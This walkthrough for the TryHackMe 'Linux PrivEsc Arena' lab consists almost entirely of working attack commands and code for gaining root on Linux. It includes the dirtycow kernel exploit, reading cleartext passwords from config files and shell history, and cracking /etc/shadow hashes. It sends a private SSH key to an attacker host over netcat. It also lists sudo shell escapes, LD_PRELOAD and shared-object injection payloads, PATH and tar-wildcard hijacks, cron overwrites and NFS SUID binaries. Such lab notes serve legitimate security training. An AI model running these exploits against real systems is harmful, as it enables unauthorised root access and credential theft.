Linux PrivEsc Arena

Room Link: https://tryhackme.com/room/linuxprivescarena

Privilege Escalation - Kernel Exploits

In command prompt type:

Victim

/home/user/tools/linux-exploit-suggester/linux-exploit-suggester.sh

From the output, notice that the OS is vulnerable to “dirtycow”.

Exploitation

Linux VM

In command prompt type:

Victim

gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w

In command prompt type:

Victim

./c0w

Disclaimer: This part takes 1-2 minutes - Please allow it some time to work.

In command prompt type:

Victim

passwd

In command prompt type:

Victim

id

From here, either copy /tmp/passwd back to /usr/bin/passwd or reset your machine to undo changes made to the passwd binary

Victim

ls -lah /usr/bin/passwd 
rm -f /usr/bin/passwd   
cp /tmp/bak /usr/bin/passwd 
ls -lah /usr/bin/passwd

Privilege Escalation - Stored Passwords (Config Files)

From the output, make note of the value of the “auth-user-pass” directive.

Victim

cat /home/user/myvpn.ovpn

From the output, make note of the clear-text credentials.

Victim

cat /etc/openvpn/auth.txt

From the output, make note of the clear-text credentials.

Victim

cat /home/user/.irssi/config | grep -i passw

Privilege Escalation - Stored Passwords (History)

Victim

cat ~/.bash_history | grep -i passw

From the output, make note of the clear-text credentials.

Privilege Escalation - Weak File Permissions

Victim

cat /etc/passwd

Save the output to a file on your attacker machine

Victim

cat /etc/shadow

Save the output to a file on your attacker machine

Kali

unshadow passwd shadow > unshadowed.txt
hashcat -m 1800 unshadowed.txt rockyou.txt -O

Privilege Escalation - SSH Keys

Found nothing for this box

Victim

find / -name authorized_keys 2> /dev/null

Victim

find / -name id_rsa 2> /dev/null
cat /backups/supersecretkeys/id_rsa

Netcat

Kali(receiving)

nc -l -p 1234 > id_rsa

Victim(sending)

nc -w 3 $KALI 1234 < id_rsa

Kali

chmod 400 id_rsa
ssh -i id_rsa root@$VICTIM

Privilege Escalation - Sudo (Shell Escaping)

Victim

 sudo -l

Victim

sudo find /bin -name nano -exec /bin/sh \;

Victim

sudo awk 'BEGIN {system("/bin/sh")}'

Victim

echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse

Victim

sudo vim -c '!sh'

Privilege Escalation - Sudo (Abusing Intended Functionality)

Victim

 sudo -l

Victim

 sudo apache2 -f /etc/shadow

Kali

 john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 
 john hash.txt --show

Privilege Escalation - Sudo (LD_PRELOAD)

Victim

 sudo -l

exploit.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

Victim

gcc -fPIC -shared -o /tmp/exploit.so exploit.c -nostartfiles
sudo LD_PRELOAD=/tmp/exploit.so apache2

Privilege Escalation - SUID (Shared Object Injection)

Victim

find / -type f -perm -04000 -ls 2>/dev/null

Victim

strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"

Victim

mkdir /home/user/.config
cd /home/user/.config
vi libcalc.c

libcalc.c

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

Victim

gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
/usr/local/bin/suid-so

Privilege Escalation - SUID (Symlinks)

Victim #1

 dpkg -l | grep nginx

Victim #1

su -l www-data

Victim #1

/home/user/tools/nginx/nginxed-root.sh /var/log/nginx/error.log

Victim #2

invoke-rc.d nginx rotate >/dev/null 2>&1

Victim #1

id

Privilege Escalation - SUID (Environment Variables #1)

Detection

Victim

find / -type f -perm -04000 -ls 2>/dev/null

Victim

strings /usr/local/bin/suid-env

Exploitation

Victim

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c

Victim

gcc /tmp/service.c -o /tmp/service
export PATH=/tmp:$PATH
/usr/local/bin/suid-env

Victim

id

Privilege Escalation - SUID (Environment Variables #2)

Detection

Victim

find / -type f -perm -04000 -ls 2>/dev/null

Victim

/usr/local/bin/suid-env2

Exploitation Method #1

Victim

function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }

Victim

export -f /usr/sbin/service

Victim

/usr/local/bin/suid-env2

Exploitation Method #2

Victim

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'

Privilege Escalation - Capabilities

Victim

getcap -r / 2>/dev/null

Victim

/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Privilege Escalation - Cron (Path)

Detection

Victim

cat /etc/crontab

Exploitation

Victim

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
chmod +x /home/user/overwrite.sh

Wait 1 minute for the Bash script to execute.

Victim

/tmp/bash -p
id

Privilege Escalation - Cron (Wildcards)

Detection

From the output, notice the script “/usr/local/bin/compress.sh”

Victim

cat /etc/crontab

Victim

cat /usr/local/bin/compress.sh

Exploitation

Victim

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh

Victim

touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh

Victim

/tmp/bash -p
id

Privilege Escalation - Cron (File Overwrite)

Detection

From the output, notice the script “overwrite.sh”

Victim

cat /etc/crontab

From the output, notice the file permissions.

Victim

ls -l /usr/local/bin/overwrite.sh

Exploitation

Victim

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh

Wait 1 minute for the Bash script to execute.

Victim

/tmp/bash -p
id

Privilege Escalation - NFS Root Squashing

Detection

From the output, notice that “no_root_squash” option is defined for the “/tmp” export.

Victim

cat /etc/exports

Exploitation

Kali

showmount -e $VICTIM

Kali

mkdir /tmp/1
mount -o rw,vers=2 10.10.26.171:/tmp /tmp/1

Kali

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c

Kali

gcc /tmp/1/x.c -o /tmp/1/x
chmod +s /tmp/1/x

Victim

/tmp/x
id

PreviousBurp Suite: Extensions Nexttomghost

Last updated 1 year ago